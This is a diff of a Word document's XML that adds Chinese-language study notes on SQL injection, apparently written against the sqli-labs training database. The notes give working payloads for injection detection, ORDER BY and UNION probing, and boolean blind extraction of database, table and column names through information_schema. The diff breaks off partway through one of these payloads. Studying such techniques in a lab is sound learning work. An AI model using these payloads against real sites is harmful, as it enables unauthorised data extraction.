--- a/sql.docx
+++ b/sql.docx
@@ -5,7 +5,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="default"/>
+          <w:rFonts w:hint="eastAsia"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
       </w:pPr>
@@ -20,6 +20,21 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>And 1=1判断sql注入</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
@@ -58,7 +73,22 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>使用order by判断字段数，</w:t>
+        <w:t>使用order by判断字段数，1，2...判断回写位</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Union内容显示需将前面置空</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -140,6 +170,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
+          <w:ilvl w:val="0"/>
           <w:numId w:val="0"/>
         </w:numPr>
         <w:rPr>
@@ -228,10 +259,11 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="宋体" w:cs="Segoe UI"/>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="宋体" w:cs="Segoe UI"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
           <w:caps w:val="0"/>
@@ -290,6 +322,1153 @@
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
         <w:t>member %23</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="宋体" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="15"/>
+          <w:szCs w:val="15"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="宋体" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="15"/>
+          <w:szCs w:val="15"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="15"/>
+          <w:szCs w:val="15"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>322580</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>25400</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="3343910" cy="1713865"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
+            <wp:wrapSquare wrapText="bothSides"/>
+            <wp:docPr id="2" name="图片 2" descr="d97954304417f310da822ebc6d990c3d"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2" name="图片 2" descr="d97954304417f310da822ebc6d990c3d"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId4"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3343910" cy="1713865"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="宋体" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="15"/>
+          <w:szCs w:val="15"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="宋体" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="15"/>
+          <w:szCs w:val="15"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="宋体" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="15"/>
+          <w:szCs w:val="15"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="宋体" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="15"/>
+          <w:szCs w:val="15"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="宋体" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="15"/>
+          <w:szCs w:val="15"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="宋体" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="15"/>
+          <w:szCs w:val="15"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="宋体" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="15"/>
+          <w:szCs w:val="15"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="宋体" w:cs="Segoe UI"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="15"/>
+          <w:szCs w:val="15"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>布尔盲注：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>判断是否存在注入</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>，确定是</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>‘’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  () </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>获取数据库长度</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">length(database())： 单位是字节，utf8编码下,一个汉字三个字 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">节，一个数字或字母一个字节。gbk编码下,一个汉字两个字 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>节，一个数字或字母一个字节。(=&gt;&lt;)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>获取数据库名</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>substr(string, start, length) 截取字符串，从1开始</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>substr(database(), 1, 1)=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>...    不推荐</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>ascii(substr(database(), 1, 1)&gt;96...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>获取数据库表数量</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">select count(table_name) from information_schema.tables </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>where table_schema="</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>数据库名</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>")=4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>%23</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>获取数据库表名</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ascii(substr((select table_name from </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>information_schema.tables where table_schema=database() limit 0,1),1,1))=101</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>获取表名长度</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>length((select table_name from information_schema.tables where table_schema=database() limit 0,1))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>获取表中字段的数量</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">select count(column_name) from information_schema.columns </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>where table_name="emails" and table_schema='security')=2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>获取字段的长度</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">length((select column_name from </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">information_schema.columns where table_name='emails' </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>and table_schema='security'limit 0,1))=2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>获取字段名</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ascii(substr((select column_name from </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">information_schema.columns where table_name='emails' </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
